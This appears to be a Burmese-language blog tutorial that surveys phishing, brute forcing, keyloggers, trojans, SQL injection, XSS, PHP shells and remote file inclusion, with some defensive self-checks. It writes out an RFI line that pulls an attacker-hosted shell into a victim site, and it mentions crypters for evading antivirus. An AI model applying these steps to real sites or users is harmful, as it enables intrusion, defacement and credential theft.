ကၽြန္ေတာ္တုိ႔ Website ေတြ Forum ေတြမွာ ေတြ႕ေနရတာ လူေတြ ေမးေနၾကတာေတြထဲက အမ်ားစုကေတာ့ အီးေမးလ္တစ္ခုကုိ ဘယ္လုိ HACK မလဲ ၊ သူ႔ password ကုိ ဘယ္လုိသိေအာင္လုပ္မလဲ ၊website တစ္ခုကုိ ဘယ္လုိ attack လုပ္မလဲ ဆုိတာေတြပါ ၊ ဒီ tutorial ေလးကေတာ့ သင့္ကုိ HACK တစ္ခုရဲ႕ အေျခခံသေဘာတရားကုိ နားလည္ေအာင္ အေထာက္အကူျပဳပါလိမ့္မယ္ ၊ေနာက္ျပီး အဲလုိ attacker ေတြရဲ႕ ရန္ကေန ဘယ္လုိကာကြယ္ရမလဲ ဆုိတာေတြကုိ ရွင္းျပသြားပါမယ္ ။
Background
Hacking ဆုိတာကေတာ့ ဟုိး Window 98 စကတည္း က ေပၚေပါက္လာခဲ့တာပါ။ Hacking ဆုိတာကေတာ့ အေျခခံအားျဖင့္ ကြန္ျပဴတာစနစ္ရဲ႕ ဂယ္ေပါက္ကုိ ရွာတာ၊ ေနာက္ information အခ်က္တစ္ခုရဲ႕ အားနည္းခ်က္ကုိ ရွာတာ ျဖစ္ပါတယ္ ၊ အဲဒီကေန attacker ဟာ အဲဒီလူရဲ႕ Critical information ေတြျဖစ္တဲ့ password တုိ႔ credit card detail ေတြကုိ သိေအာင္လုပ္သြားတာပါပဲ ၊
Initialization
အရင္ဆံုး Hacking ကုိ ခ်ဳပ္ၾကည့္မယ္ဆုိရင္ အဓိက ႏွစ္ပုိင္း ရွိပါတယ္။
၁။ Email or user information
၂။Web based hacking
Email or user information
အခုေခတ္မွာ email password ,credit card information တုိ႔အတြက္ ေအာက္ပါနည္းလမ္းေတြကုိ အသံုးမ်ားပါတယ္။
၁။Phishing
၂။Brute Forcing
၃။Keylogging
၄။Trojans
Phishing(webpage အတုျဖင့္တုိက္ခုိက္ျခင္း)
Phishing ကေတာ့ အေျခခံအားျဖင့္ အမ်ားစုကုိ တုိက္ခုိက္ဖုိ႔ အတြက္သံုးပါတယ္ ။ ဒီနည္းနဲ႔ တုိက္ခုိက္ဖုိ႔ အတြက္ hacker ဟာ Yahoo တုိ႔ Gmail တုိ႔ နဲ႔ အေပၚယံ သြင္ျပင္ခ်င္း ဆင္တူတဲ့ website တစ္ခုကုိ ေရးပါတယ္ ၿပီးတဲ႔ အခါမွာ အဲဒီ အတုအေယာင္ webpage ကုိ သူတုိ႔ရဲ႕ ကုိယ္ပုိင္ server မွာတင္ပါတယ္။ ၿပီးရင္ အဲဒီ website link ကုိ user မ်ားဆီကုိ ျဖန္႔ပါတယ္ ..(Fwd mail နဲ႔ ျဖစ္ျဖစ္ forum တစ္ခုခုမွာ post တင္ျပီးျဖစ္ျဖစ္ ျဖန္႔ပါတယ္ ) user ေတြက အဲဒီ webpage ကုိ ဖြင့္လုိက္မယ္ ၊ user ေတြရဲ႕စိတ္ထဲ မွာ တကယ့္ Gmail Yahoo webpage လုိ႔ ပဲ ထင္ေနျပီးေတာ့ သူတုိ႔ရဲ႕ username နဲ႔ password ကုိ ယံုယံုၾကည္ၾကည္ရုိက္ထည့္လုိက္မယ္ ဆုိရင္ အဲဒါေတြဟာ attacker ေတြဆီကုိ ေရာက္သြားျပီ ျဖစ္ပါတယ္။ ဒီနည္းကေတာ့ hacking ေလာကကုိ ၀င္ဖုိ႔ ၾကိဳးစားေနတ့ဲ သူမ်ား အမ်ားဆံုးအသံုးျပဳၾကတဲ့နည္းျဖစ္ပါတယ္။
မေကာင္းက်ိဳးမ်ား
မေကာင္းတာတစ္ခုကေတာ့ user ဟာ အင္တာနက္အေၾကာင္းကုိ အနည္းငယ္မွ်သိ ရံုနဲဲ႔ phishing attack ကုိ ေရွာင္ႏုိင္ပါတယ္။ user ဟာ website URL address ကုိ ၾကည့္ရံုနဲ႔ ဒီ website ဟာ အစစ္ဟုတ္မဟုတ္ သိႏုိင္ပါတယ္။
Brute Forcing
Brute Forcer ကေတာ့ cracker program တစ္ခုပါပဲ ။hack ခ်င္တဲ့ username ကုိ ထည့္ၿပီး သူ႔ရဲ႕ password ကုိမွန္ေအာင္ ေဖာ္ထုတ္တဲ႔ နည္းျဖစ္ပါတယ္။ ဒီမွာ hacker ဟာသူျဖစ္ႏုိင္မယ္ထင္ရတဲ့ password မ်ားကုိ notepad မွာထည့္ၿပီး တုိက္ၾကည့္တာျဖစ္ပါတယ္။
မေကာင္းက်ိဳးမ်ား
brute attack ဟာတခါတရံမွာ အခ်ိန္ေတာ္ေတာ္ၾကာတတ္ပါတယ္။ ေအာင္ျမင္ ႏုိင္တယ္လုိ႔ ေသခ်ာေျပာလုိ႔ မရပါဘူး ။ ေနာက္ျပီး အခုေခတ္မွာ user ေတာ္ေတာ္မ်ားမ်ားဟာ alpha-numeric-symbol တြဲထားတဲ့ password ေတြကုိ သံုးလာတဲ့ အတြက္ brutefocer အတြက္ hack ဖုိ႔ရာ အေတာ္ခက္ခဲသြားပါျပီ။ လူသံုးမ်ားေသာ website မ်ားျဖစ္တဲ့ Yahoo Google စတဲ႔ website မ်ားတြင္လည္း brute attack ကုိ ကာကြယ္ဖုိ႔ login password ၃ ခါမွားလွ်င္ “image captcha” ဖမ္းေပးရတဲ့ နည္းလမ္းမ်ားကုိ သံုးလာၾကပါၿပီ။ (image captcha=check the letter in the picture and type them in text box)
Keylogging
Keylogger ဆုိတာ server တစ္ခုကုိ ဖန္တီးေပးတဲ႔ program ေလးတစ္ခုပါ။user ဟာ အဲဒီ program ေလးကုိ click လုိက္တာနဲ႔ ကိစၥျပီးသြားပါျပီ ။ဒါကေတာ့ user ေတြကုိ hack နုိင္ဖုိ႔ အျဖစ္ႏုိင္ဆံုးနည္း တစ္ခုပါပဲ။ user ေတြဟာ Keylogger ကုိ သူတုိ႔ ကုိယ္တုိင္ သူတုိ႔ ရဲ႕ computer မွာ install လုပ္ျပီဆုိတာနဲ႔ keylogger ဟာ keyboard ကေန ရုိက္သမွ် စာေတြကုိ record လုပ္ျပီး hacker ဆီကုိ တုိက္ရုိက္ပုိ႔ မွာျဖစ္ပါတယ္။ ပုိ႔တဲ့နည္းေတြကေတာ့ FTP,Email,Messenger စသည္ျဖင့္ရွိပါတယ္။ ကၽြန္ေတာ့္အတြက္ကေတာ့ ဒါဟာ user ေတြဆီကေန information ရယူဖုိ႔ အလြယ္ဆံုးလုိ႔ေျပာခ်င္ပါတယ္။ software မွန္သမွ်ကုိ ယံုၾကည္ရမွ run ဖို႔သင့္ပါတယ္။ ကုိယ့္ဆီက information hack မယ့္သူရဲ႕ hacking software ကုိ ကုိကုိယ္တုိင္ install မလုပ္မိဖုိ႔ လုိအပ္ပါတယ္။ freeware shareware ဆုိတုိင္းလဲ ယံုၾကည္ရတာမဟုတ္ပါဘူး။
မေကာင္းက်ိဳးမ်ား
အကယ္လုိ႔ user ဟာ အဲဒီ keylogger ကုိလက္ခံမိရင္ေတာင္မွ antivirus ေတြဟာ detect ျဖစ္ပါတယ္။ဒါေၾကာင့္ အဲဒါ install လုပ္ဖုိ႔ user ေတြကေန သူတုိ႔ရဲ႕ antivirus ကုိ disable လုပ္ထားရမွာျဖစ္ပါတယ္။ ေနာက္ျပီးတခါတရံ မွာ message ပုိ႔တာကုိ window firewall ရဲ႕ block ျခင္းခံရတတ္ပါတယ္။Tips: cypters လုိ႔ ေခၚတဲ့ program ေလးေတြကေတာ့ attacker ရဲ႕ server program ေလးေတြကုိ antivirus ေတြကေန detect မလုပ္ႏုိင္ေအာင္ ကာကြယ္ေပးႏုိင္ပါတယ္။
Trojans
Trojans ေတြကေတာ့ keylogger ေတြလုိပါပဲ။ Trojans ေတြဟာ keylogger ေတြလုိပဲ keyboard logs ေတြကုိ attacker ေတြဆီကုိ send ႏုိင္ပါတယ္။ ေနာက္တစ္ခုကေတာ့ Trojans ေတြဟာ attacker ေတြကုိ user ရဲ႕ ကြန္ျပဴတာကုိ ထိန္းခ်ဳပ္ႏုိင္ေအာင္ ျပဳလုပ္ေပးႏုိင္ပါတယ္။တစ္ခ်ိဳ႕ဆုိ user ရဲ႕ ကြန္ျပဴတာက CDROM ေတြကုိ ေတာင္အသြင္းအထုတ္ ျပဳလုပ္ႏုိင္ပါတယ္။
မေကာင္းက်ိဳးမ်ား
keylogger နဲ႔ အတူတူပါပဲ
WEB Hacking
WEB hacking မွာေတာ့ အမ်ားအားျဖင့္ ၄ မ်ိဳးရွိပါတယ္။
၁။SQL injection
၂။XSS
၃။Shells
၄။RFI
၅။ ေနာက္ထပ္အခ်ိဳ႕ရွိပါေသးတယ္။ဒါေပမယ့္ ရွင္းျပဖုိ႔ အလြန္မ်ားျပားပါတယ္။
SQL injection: အခုေခတ္ website အမ်ားစုဟာသူတုိ႔ဆီကုိ user တစ္ေယာက္ register လုပ္လာျပီဆုိရင္ သူတုိ႔ရဲ႕ username မ်ားနဲ႔ password မ်ားကုိ (encrypted လုပ္ျပီး ) ထိန္းသိမ္းဖုိ႔အတြက္ SQL database ကုိ အသံုးမ်ားပါတယ္။website ဟာ database ဆီကုိ user login ၀င္တုိင္းမွာ password ကုိ validate လုပ္ဖုိ႔အတြက္ request ပုိ႔ေပးရပါတယ္။ အကယ္လုိ႔ မွန္ရင္ website ဟာ user ကုိ access လုပ္ေပးျပီး မွားခဲ့ရင္ error ေပးပါမယ္။ အေျခခံကေတာ့ အဲဒီပုိ႔လုိက္တဲ့ request မွာ code ေတြကုိ ထည့္သြင္းလုိက္ျပီး database မွာရွိတဲ့ information ကုိ တျခားတေနရာသုိ႔ ပုိ႔ေပးေစျခင္းျဖစ္ပါတယ္။ အက်ယ္တ၀င့္ရွင္းျပဖုိ႔ ဒီမွာ မလြယ္ပါဘူး။ အကယ္လုိ႔ ကုိယ့္ website ကုိ hack ခံရ မခံရ ကုိ စစ္ဖုိ႔
သင့္ရဲ႕ website URL ပါ
yoursite.com/index.php?id=545
အဲဒါရဲ႕ ေနာက္ဆံုးမွာ ေအာက္ပါအတုိင္းျဖည့္လုိက္ပါ
yoursite.com/index.php?id=545’
XSS: XSS ကလည္း website မ်ားကုိ hack တဲ့ေနရာမွာ ေကာင္းတဲ့ နည္းတစ္ခုပါပဲ။ အကယ္လုိ႔ website /forum တစ္ခုဟာ html post တစ္ခုခု ကုိ တင္ခြင့္ျပဳထားမယ္ဆုိရင္ hacker ဟာ script တစ္ခုကုိ post တင္လုိက္ပါမယ္။ user တစ္ေယာက္ဟာ အဲဒီ script webpage ကုိ ဖြင့္လုိက္ရံုနဲ႔ script ဟာ user browser cookies ေတြကုိ hacker ဆီသုိ႔ ပုိ႔ေပးလုိက္မွာျဖစ္ပါတယ္။ ဒီလုိနဲ႔ hacker ဟာ အဲဒီ user နာမည္နဲ႔ login ၀င္ႏုိင္ေတာ့မွာ ျဖစ္ပါတယ္ ။
Shells: Shell ဆုိတာကေတာ့ မလုိလားအပ္တဲ့ .php script ေတြပါ။ ဒီမွာလုပ္ရမွာက အရင္ဆံုး avatars တုိ႔ recepie တုိ႔ ticks တုိ႔ feedbacks တုိ႔ ကုိ upload တင္ႏုိင္တဲ့ website/ forum တုိ႔ကုိအရင္ရွာရပါမယ္။ ျပီးရင္ အဲဒီ forum မွာ ကုိယ့္ရဲ႕ shell file ေလးကုိ အဲဒီမွာ upload လုပ္ပါမယ္။ ျပီးရင္ URL bar ကေနျပီး အဲဒီ file ေလးကုိ open လုိက္တာနဲ႔ အဲဒီ website upload လုပ္ထားတဲ့ webhosting ရဲ႕ FTP account တစ္ခုလံုးကုိ ျမင္ေတြ႕ရမွာ ျဖစ္ပါတယ္။ ဒါဆုိရင္ေတာ့ attacker ဟာ အဲဒီ website ရဲ႕ index page အပါအ၀င္ ၾကိဳက္တာကုိ edit လုပ္ခြင့္ရရွိသြားမွာ ျဖစ္ပါတယ္။ (deface လုိ႔လည္းေခၚပါတယ္)
RFI: RFI (remote file inclusion) ဒီနည္းမွာ attacker ဟာ သူ႔ရဲ႕ php script code ေတြကုိ သင့္ရဲ႕ php application ထဲကုိ ၾကိဳးစားျပီးထည့္သြင္းရပါတယ္။ attacker က ေအာင္ျမင္စြာ ထည့္သြင္းႏုိင္ျပီဆုိတာနဲ႔ attacker ဟာ user ရဲ႕ webserver ကုိ ထိန္းခ်ဳပ္ခြင့္ ရသြားမွာျဖစ္ပါတယ္။ ဒီမွာ Shell ကုိ အသံုးျပဳပါတယ္။ ဥပမာ attacker ဟာ သူ႔ရဲ႕ code ကုိ ဒီမွာ upload ထားျပီ ဆုိပါစုိ႔။
yoursite.com/shell.txt
hack ခ်င္တဲ့ webpage address မွာ
victimssite.com/index.php?page=yoursite.com/shell.txt
ဒါဆုိရင္ user ရဲ႕ website FTP server က attacker ကုိ edit လုပ္ခြင့္ေပးလုိက္ျပီျဖစ္ပါတယ္။
သင့္ webpage ကုိ အဲလုိတုိက္ခုိက္ခံရသလား စစ္ခ်င္ရင္ေတာ့
သင့္ webpage url :
yoursite.com/index.php?id=545
ေနာက္ဆံုးမွာထပ္ျဖည့္လုိက္ပါ
yoursite.com/index.php?id=http://www.google.com
အကယ္လုိ႔ google page ဟာ သင့္ webpage ထဲပါလာရင္ သင့္ website ဟာတုိက္ခုိက္ခံ ေနရျပီလုိ႔ မွတ္လုိ႔ရပါတယ္
more info
http://cyberwarez.info/forum/tutorials-manuals-tricks/545568-complete-hacking-guide.html
No comments:
Post a Comment